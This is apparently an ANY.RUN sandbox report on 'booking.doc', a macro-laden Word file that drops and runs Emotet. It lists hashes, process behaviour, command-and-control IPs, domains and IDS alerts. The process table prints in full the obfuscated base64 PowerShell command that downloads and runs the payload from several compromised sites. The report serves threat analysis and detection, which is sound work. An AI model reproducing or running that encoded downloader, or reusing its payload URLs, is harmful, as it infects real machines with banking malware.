analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

booking.doc

Full analysis: https://app.any.run/tasks/7e7acdf7-e527-47c1-aa37-44161abc2ec4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 16, 2019, 09:28:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolore sunt a., Author: Laura Brehmer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 21:33:00 2019, Last Saved Time/Date: Fri Nov 15 21:33:00 2019, Number of Pages: 1, Number of Words: 21, Number of Characters: 121, Security: 0
MD5:

45CF8F0BC99856BC508DF2242BF08DB1

SHA1:

8539C7075E7060946E5774779429F0ADCEE08170

SHA256:

D115EB3832178142E9A59F565E63729F54E110CC963DC7F10B95F5BEFF943CB7

SSDEEP:

3072:cxTyQH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/+qls5nIo:cxTyQHNaqjSzGdD48+aPOnX8s5n3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 790.exe (PID: 1916)
      • serialfunc.exe (PID: 2420)
      • 790.exe (PID: 1904)
      • serialfunc.exe (PID: 792)
      • serialfunc.exe (PID: 2960)
      • serialfunc.exe (PID: 776)
      • serialfunc.exe (PID: 4048)
      • serialfunc.exe (PID: 3100)
    • Emotet process was detected

      • 790.exe (PID: 1904)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 792)
      • serialfunc.exe (PID: 3100)
    • Connects to CnC server

      • serialfunc.exe (PID: 792)
      • serialfunc.exe (PID: 3100)
    • EMOTET was detected

      • serialfunc.exe (PID: 792)
      • serialfunc.exe (PID: 3100)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2332)
    • PowerShell script executed

      • powershell.exe (PID: 2332)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2332)
      • 790.exe (PID: 1904)
    • Application launched itself

      • 790.exe (PID: 1916)
      • taskmgr.exe (PID: 3884)
      • serialfunc.exe (PID: 776)
      • serialfunc.exe (PID: 4048)
    • Executed via WMI

      • powershell.exe (PID: 2332)
    • Starts itself from another location

      • 790.exe (PID: 1904)
    • Connects to server without host name

      • serialfunc.exe (PID: 792)
      • serialfunc.exe (PID: 3100)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 292)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1892)
    • Manual execution by user

      • taskmgr.exe (PID: 3884)
      • serialfunc.exe (PID: 776)
      • serialfunc.exe (PID: 4048)
      • chrome.exe (PID: 292)
      • cmd.exe (PID: 1636)
      • chrome.exe (PID: 1520)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1892)
    • Reads the hosts file

      • chrome.exe (PID: 292)
      • chrome.exe (PID: 4032)
      • chrome.exe (PID: 1520)
      • chrome.exe (PID: 2484)
    • Reads settings of System Certificates

      • chrome.exe (PID: 4032)
      • chrome.exe (PID: 2484)
    • Application launched itself

      • chrome.exe (PID: 292)
      • chrome.exe (PID: 1520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Dolore sunt a.
Subject: -
Author: Laura Brehmer
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:11:15 21:33:00
ModifyDate: 2019:11:15 21:33:00
Pages: 1
Words: 21
Characters: 121
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 141
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
111
Monitored processes
63
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe taskmgr.exe no specs 790.exe no specs #EMOTET 790.exe taskmgr.exe serialfunc.exe no specs #EMOTET serialfunc.exe serialfunc.exe serialfunc.exe no specs serialfunc.exe no specs #EMOTET serialfunc.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs chrome.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1892"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\booking.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2332powershell -w hidden -enco JABPAGsAcQBoAHEAcQB5AGwAZQB1AHoAYwB5AD0AJwBOAGUAYQBqAHIAegBhAGoAaQB3AG8AdgBvACcAOwAkAEgAbwBsAHgAbABtAG0AZwAgAD0AIAAnADcAOQAwACcAOwAkAEIAZABwAHAAbwB2AHAAawBiAGIAagBjAD0AJwBFAHEAdAB5AHgAaQBtAHcAJwA7ACQAWQBtAHcAYQByAGEAdQBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAG8AbAB4AGwAbQBtAGcAKwAnAC4AZQB4AGUAJwA7ACQATwBiAGgAbABiAHYAawBxAGoAYQB4AHoAaQA9ACcAUgBwAHEAaQBwAHAAeQBnAGgAcgAnADsAJABLAG8AbQBpAGcAdAB3AHEAegBrAHQAeAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAEwASQBFAG4AdAA7ACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiAD0AJwBoAHQAdABwAHMAOgAvAC8AcwB1AGEAcgBlAHoAYwBvAHIAcgBlAGQAbwByAGUAcwAuAGMAbAAvAGMAZwBpAC0AYgBpAG4ALwBrAFoAWABVAHgAWAAvACoAaAB0AHQAcABzADoALwAvAHcAYQB0AGUAcgAtAGMAbwBvAGwAZQBkAC0AYwB5AGMAbABlAHMALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBOAE0ASAB4AEcAagAvACoAaAB0AHQAcABzADoALwAvAGEAawBjAGEAbgAtAHQAdQByAGkAegBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AHoAdgBvAGkALQBoAGkAZQA2AHcAbgBwAHkAdwBlAC0AMgA4ADUANQA0ADEAMgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYgBpAGQAYQAxADIAMwAuAHAAdwAvAHQAZwA5AHcALwAzAGYAOAAtADYAdQBmADMAZAA2AGsAZgBvAGUALQAzADQANgAwADEANQAyADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGkAbgBxAGkAbABhAHcAeQBlAHIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBqAGgAbwAtAHgAbgAwAHEALQAwADEAMgAwADkANQAzADcAOQA0AC8AJwAuACIAUwBwAEwAYABpAHQAIgAoACcAKgAnACkAOwAkAFAAdwBtAGkAZgBnAHEAYgA9ACcARQBpAGcAcgBzAHQAYwBkAGYAaAByACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAGcAagBkAGQAaABsAGYAaQBoAGkAcwAgAGkAbgAgACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiACkAewB0AHIAeQB7ACQASwBvAG0AaQBnAHQAdwBxAHoAawB0AHgALgAiAGQAYABvAGAAdwBgAE4AbABvAGEAZABGAGkATABlACIAKAAkAEgAZwBqAGQAZABoAGwAZgBpAGgAaQBzACwAIAAkAFkAbQB3AGEAcgBhAHUAZwApADsAJABUAHcAbwBpAGoAcAB1AHoAdAA9ACcAVgB1AHcAcgByAHMAcwBiAHgAYwBsAGgAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABZAG0AdwBhAHIAYQB1AGcAKQAuACIAbABlAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMQA2ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABZAG0AdwBhAHIAYQB1AGcAKQA7ACQARQBlAGUAbQByAGsAYgBxAHQAbAByAHkAaAA9ACcATwBrAGcAbQB3AHkAdwBrAGwAbQBvAHAAJwA7AGIAcgBlAGEAawA7ACQASABwAGwAawBtAGwAcQB2AD0AJwBKAHUAZABjAGcAYQB1AGwAcQBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAcABiAHkAaQB1AHMAegA9ACcASwBuAGwAdwBmAG4AdQBhAGIAdABjAHYAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3884"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1916"C:\Users\admin\790.exe" C:\Users\admin\790.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1904--4c25e06cC:\Users\admin\790.exe
790.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1096"C:\Windows\system32\taskmgr.exe" /1C:\Windows\system32\taskmgr.exe
taskmgr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Task Manager
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2420"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe790.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
792--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
776"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2960--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exeserialfunc.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
3 045
Read events
2 441
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
59
Text files
281
Unknown types
29

Dropped files

PID
Process
Filename
Type
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA989.tmp.cvr
MD5:
SHA256:
2332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LEY6PE5GSSD8KTLSF23L.temp
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF54138A0BEBDBB284.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD45E5BDB595C7496.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE756E671A6915448.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFA03CD3-2336-439E-8D62-C45CCD9FDBE4}.tmp
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD3925797D5BFE187.TMP
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{70DBE3C5-8762-4A1D-B087-6A3122B52C4D}.tmp
MD5:
SHA256:
1892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:2455C15589843C2EAC35FCC061519C34
SHA256:BC568529570B0DE768C51D903FF633EE4D7AF0B68F2109CC33CC6585744D0712
1892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\659D5A9.wmfwmf
MD5:F66A5CB55DC953CEE945382BB4220A3D
SHA256:3A2D4B95C3DDA1E58CD02B6F157871DEE010C00CB6495D191EC069A3F6A9F21E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
37
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4032
chrome.exe
GET
195.21.56.7:80
http://195.21.56.7/devices
GB
unknown
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/stubs/guids/
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/favicon.ico
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/stubs
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/favicon.ico
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/favicon.ico
RU
malicious
2484
chrome.exe
GET
200
195.201.56.70:80
http://195.201.56.70/favicon.ico
RU
malicious
792
serialfunc.exe
POST
200
195.201.56.70:80
http://195.201.56.70/devices/
RU
binary
132 b
malicious
4032
chrome.exe
GET
200
103.2.116.76:80
http://r1---sn-f5p5-hxae.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mip=85.203.20.5&mm=28&mn=sn-f5p5-hxae&ms=nvh&mt=1573896439&mv=m&mvi=0&pl=25&shardbypass=yes
AU
crx
293 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2332
powershell.exe
138.117.149.13:443
suarezcorredores.cl
Gtd Internet S.A.
CL
suspicious
4032
chrome.exe
216.58.205.227:443
www.google.com.ua
Google Inc.
US
whitelisted
3100
serialfunc.exe
195.201.56.70:80
PP Podilsky Intelectualni sistemy
RU
malicious
4032
chrome.exe
172.217.18.110:443
ogs.google.com
Google Inc.
US
whitelisted
792
serialfunc.exe
195.201.56.70:80
PP Podilsky Intelectualni sistemy
RU
malicious
4032
chrome.exe
172.217.22.106:443
fonts.googleapis.com
Google Inc.
US
whitelisted
4032
chrome.exe
172.217.21.238:443
clients2.google.com
Google Inc.
US
whitelisted
4032
chrome.exe
172.217.16.163:443
fonts.gstatic.com
Google Inc.
US
whitelisted
4032
chrome.exe
216.58.208.45:443
accounts.google.com
Google Inc.
US
whitelisted
2332
powershell.exe
145.14.145.152:443
water-cooled-cycles.000webhostapp.com
Hostinger International Limited
US
shared

DNS requests

Domain
IP
Reputation
suarezcorredores.cl
  • 138.117.149.13
suspicious
water-cooled-cycles.000webhostapp.com
  • 145.14.145.152
shared
clientservices.googleapis.com
  • 172.217.22.99
  • 172.217.18.3
whitelisted
accounts.google.com
  • 216.58.208.45
shared
www.google.com.ua
  • 216.58.205.227
whitelisted
fonts.googleapis.com
  • 172.217.22.106
whitelisted
www.gstatic.com
  • 216.58.207.67
whitelisted
fonts.gstatic.com
  • 172.217.16.163
whitelisted
apis.google.com
  • 216.58.206.14
whitelisted
ogs.google.com
  • 172.217.18.110
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2332
powershell.exe
Not Suspicious Traffic
ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
792
serialfunc.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
792
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3100
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
6 ETPRO signatures available at the full report
No debug info